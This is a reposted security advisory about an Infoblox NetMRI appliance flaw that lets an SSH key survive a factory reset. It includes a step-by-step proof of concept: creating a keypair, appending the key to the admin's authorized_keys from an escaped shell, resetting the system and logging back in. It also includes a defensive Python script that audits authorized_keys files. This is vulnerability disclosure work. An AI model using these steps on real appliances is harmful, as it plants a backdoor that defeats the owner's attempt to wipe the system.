Infoblox NetMRI VM-AD30-5C6CE Factory Reset Persistence

Published 25 Oct 2017. Reported by Matthew Bergin. Type: packetstorm. Source: packetstormsecurity.com

Infoblox NetMRI VM-AD30-5C6CE Factory Reset Persistence. The vulnerability allows unauthorized installation of an SSH key that survives factory resets.

KL-001-2017-018 : Infoblox NetMRI Administration Shell Factory Reset Persistence  
  
Title: Infoblox NetMRI Administration Shell Factory Reset Persistence  
Advisory ID: KL-001-2017-018  
Publication Date: 2017.10.24  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-018.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Infoblox  
Affected Product: NetMRI  
Affected Version: VM-AD30-5C6CE  
Platform: Embedded Linux  
CWE Classification: CWE-485: Insufficient Encapsulation  
Impact: Administrative Account Backdoor  
Attack vector: SSH  
  
2. Vulnerability Description  
  
An authenticated user who has escaped the management shell  
can install a public SSH key which will survive factory resets.  
  
3. Technical Description  
  
1. Create a SSH keypair.  
  
$ ssh-keygen -f netrmi-backdoor  
Generating public/private rsa key pair.  
Enter passphrase (empty for no passphrase):  
Enter same passphrase again:  
Your identification has been saved in netrmi-backdoor.  
Your public key has been saved in netrmi-backdoor.pub.  
The key fingerprint is:  
1e:d6:55:7b:f6:a1:a5:9f:ea:8d:2b:4d:5d:ae:9e:19 fake@fake  
The key's randomart image is:  
+--[ RSA 2048]----+  
| . |  
| . . |  
| . .oo|  
| . . +o+|  
| S . o..o|  
| o . ...o|  
| . o E+ |  
| . .=+ |  
| o*=. |  
+-----------------+  
  
2. As 'admin' from an escaped shell, echo the public key to authorized_keys.  
  
[admin@NetMRI-VM-AD30-5C6CE ~]$ echo ssh-rsa  
AAAAB3NzaC1yc2EAAAADAQABAAABAQDmjcavayYmGgsNUggeILWSw8qGKAZeWkH/01oP/1M8d249zYBJRHri0hJn13DItuOCn/1/RWxFQsUtoph2dHsAnOYPZXEXofPfmWbqOdaOOK+TbrMAgc0CdgKtIDE01LHob4S8s4N//jCHGWUQzv5KAUebRUtR1K7STAQdMnKbhZeoUBoVgvekjnZZ+3gFGg6C7FDg3Z8VstWYJmqxo7N4awEI95fnJ551O4sr9owdIwoZ5OhO0cbt8HGzoCsdbinICKUg3CIhfnmLnNfHtySmBf6srFx7QQ3Gy5lmW7nXNEYrDoXc37H+mpSR0rtPtuWr9GolP9ccHbbIyQXL6frV  
fake@fake >> /home/admin/.ssh/authorized_keys  
[admin@NetMRI-VM-AD30-5C6CE ~]$ exit  
exit  
[admin@NetMRI-VM-AD30-5C6CE Backup]$ exit  
exit  
ping: IDN encoding of '' failed with error code 5  
  
3. Factory reset the system using the management shell.  
  
NetMRI-VM-AD30-5C6CE> ?  
  
Available Commands:  
acl ftp md5sum register setup  
autoupdate grep more remoteCopy show  
cat halt netstat removedsb snmpwalk  
clear help ping removemib ssh-key  
configure installdsb provisiondisk repair supportbundle  
debug installhelpfiles quit reset telnet  
deregister installmib rdtclient restore tftpsync  
diagnostic license reboot rm top  
exit ls recalculate-spm route traceroute  
export maintenance refreshgroups set  
  
NetMRI-VM-AD30-5C6CE> reset  
  
Reset Commands:  
admin cli snmp tunclient  
all_licenses database system  
  
NetMRI-VM-AD30-5C6CE> reset system  
  
*******************************************************************  
WARNING WARNING WARNING WARNING WARNING  
  
This script deletes the network database, all database archive  
files, all server logs, all issue details, all files stored  
in the administrator shell directory and all user logins.  
This script also resets the administrator password to 'admin'  
and erases all customer-specific configuration information.  
  
WARNING WARNING WARNING WARNING WARNING  
*******************************************************************  
  
Do you really want to reset (y|n)? [n]y  
  
+++ Stopping Server ...  
+++ Clearing MQ data ...  
+++ Removing Server Logs ...  
+++ Removing User Logins ...  
+++ Resetting Admin Password ...  
+++ Clearing Network Database ...  
+++ Clearing All Config Files ...  
+++ Clearing subscribers and subscriptions ...  
+++ Clearing reports ...  
+++ Clearing device support bundles ...  
+++ Removing Certificates ...  
+++ Rebuilding database ...  
+++ Restoring pre-packaged policies ...  
+++ Resetting Server Configuration ...  
Server is down, skipping comm server restart  
+++ Installing Weekly Maintenance Process ...  
+++ Resetting Server Name ...  
+++ Resetting Banner Logo ...  
+++ Resetting Network Interfaces ...  
+++ Processing Interface eth0 ...  
+++ Processing Interface eth1 ...  
+++ Processing Interface eth2 ...  
+++ Processing Interface eth3 ...  
+++ Resetting DNS Configuration ...  
+++ Clearing Admin Directory ...  
+++ Resetting Firewall Settings ...  
+++ Resetting Time Zone ...  
+++ Resetting Security Settings ...  
  
#############################################################  
The system needs to be rebooted to complete the reset process  
#############################################################  
  
Enter 'reboot' or 'halt' [reboot]: reboot  
+++ Reset Complete  
  
+++ Rebooting System ...  
  
Broadcast message from admin@NetMRI-VM-AD30-5C6CE on pts/0 (Mon, 13 Mar 2017 18:59:02 -0400):  
  
The system is going down for reboot NOW!  
  
Connection to 1.3.3.7 closed by remote host.  
  
4. Login to the system using the private key.  
  
$ ssh -i netrmi-backdoor [email protected]  
NetMRI VM-AD30-5C6CE  
ALL UNAUTHORIZED ACCESS TO THIS SYSTEM WILL BE PROSECUTED TO THE MAXIMUM EXTENT ALLOWED BY APPLICABLE LAWS.  
Last login: Mon Mar 13 17:00:07 2017 from 1.3.3.7  
  
************************************************************************  
ALL UNAUTHORIZED ACCESS TO THIS SYSTEM WILL BE PROSECUTED TO THE MAXIMUM  
EXTENT ALLOWED BY APPLICABLE LAWS.  
************************************************************************  
  
NetMRI Administrative Shell  
---------------------------  
  
Available Commands:  
acl ftp md5sum register setup  
autoupdate grep more remoteCopy show  
cat halt netstat removedsb snmpwalk  
clear help ping removemib ssh-key  
configure installdsb provisiondisk repair supportbundle  
debug installhelpfiles quit reset telnet  
deregister installmib rdtclient restore tftpsync  
diagnostic license reboot rm top  
exit ls recalculate-spm route traceroute  
export maintenance refreshgroups set  
  
NetMRI-VM-AD30-5C6CE>  
  
4. Mitigation and Remediation Recommendation  
  
There is no known remediation for this vulnerability from the  
vendor. Administrators should heavily restrict access to any  
account of any privilege which can use the ping command in  
the NetMRI CLI.  
  
Network access to management interfaces should be properly segmented.  
  
Assuming the lack of input sanitation in the NetMRI CLI is not  
addressed: use that vulnerability to check for the existence of  
any SSH keys. No keys should be present.  
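An added audit helper for the check recommended above; it is not part of the KoreLogic advisory or of NetMRI. It parses an authorized_keys file (including the optional options prefix such as command="..." or no-pty), computes each key's SHA256 fingerprint from the raw blob, and reports every entry that is malformed or not on an allow-list, which after a factory reset should be empty. The sample file and its key blob are constructed for the example and are not real keys.

```python
import base64, hashlib, re, struct
# One authorized_keys line is: [options] key-type base64-blob [comment]
LINE_RE = re.compile(r'^(?:(?P<options>(?:[^\s"]|"[^"]*")+)\s+)?'
                     r'(?P<ktype>(?:ssh|ecdsa|sk)-[\w.@-]+)\s+'
                     r'(?P<b64>[A-Za-z0-9+/=]+)(?:\s+(?P<comment>.*))?$')

def ssh_string(data):
    # SSH wire-format string: 4-byte big-endian length, then the bytes
    return struct.pack(">I", len(data)) + data

def fingerprint(blob):
    # OpenSSH-style SHA256 fingerprint of the raw public-key blob
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")

def parse_authorized_keys(text):
    # Yield one dict per non-comment line; malformed lines are kept and flagged
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            yield {"line": lineno, "problem": "unparseable line"}
            continue
        entry = {"line": lineno, "problem": None, "options": m["options"],
                 "ktype": m["ktype"], "comment": m["comment"]}
        try:
            blob = base64.b64decode(m["b64"], validate=True)
            inner_len = struct.unpack(">I", blob[:4])[0]
            inner_type = blob[4:4 + inner_len].decode()  # type string inside the blob
            entry["fingerprint"] = fingerprint(blob)
            if inner_type != m["ktype"]:  # label and blob must agree
                entry["problem"] = f"declared {m['ktype']} but blob is {inner_type}"
        except (ValueError, struct.error, UnicodeDecodeError):
            entry["problem"] = "undecodable key blob"
        yield entry

def audit(text, allowed_fingerprints):
    # Lines that are malformed or not allow-listed; after a reset the allow-list is empty
    return [e["line"] for e in parse_authorized_keys(text)
            if e["problem"] or e["fingerprint"] not in allowed_fingerprints]

# Constructed sample: wire-format key type plus dummy key material, NOT a real key
ED_BLOB = ssh_string(b"ssh-ed25519") + ssh_string(b"\x01" * 32)
ED_B64 = base64.b64encode(ED_BLOB).decode()
SAMPLE = "\n".join([
    f"ssh-ed25519 {ED_B64} backup-host",
    f'command="/bin/false",no-pty ssh-ed25519 {ED_B64} fake@fake',
    f"ssh-rsa {ED_B64} mismatched",
])
```

Run `audit(open(path).read(), set())` against a copy of /home/admin/.ssh/authorized_keys retrieved after a reset; any returned line number is a finding.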
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
of KoreLogic, Inc.  
  
6. Disclosure Timeline  
  
2017.07.21 - KoreLogic requests security contact and PGP key from  
Infoblox.  
2017.07.21 - Infoblox suggests '[email protected]' with  
PGP key id 0xC4AB2799.  
2017.07.24 - KoreLogic submits vulnerability information to Infoblox.  
2017.07.31 - 5 business days have elapsed since the vulnerability  
was reported. No response from Infoblox.  
2017.09.15 - KoreLogic requests update from Infoblox.  
2017.09.26 - 45 business days have elapsed since the vulnerability  
was reported to Infoblox.  
2017.10.17 - KoreLogic requests an update from Infoblox.  
2017.10.18 - 60 business days have elapsed since the vulnerability  
was reported to Infoblox.  
2017.10.24 - KoreLogic public disclosure.  
  
7. Proof of Concept  
  
See 3. Technical Description.  
  
  
The contents of this advisory are copyright(c) 2017  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt  
  

Vulners AI Score: 6.7 (Medium risk)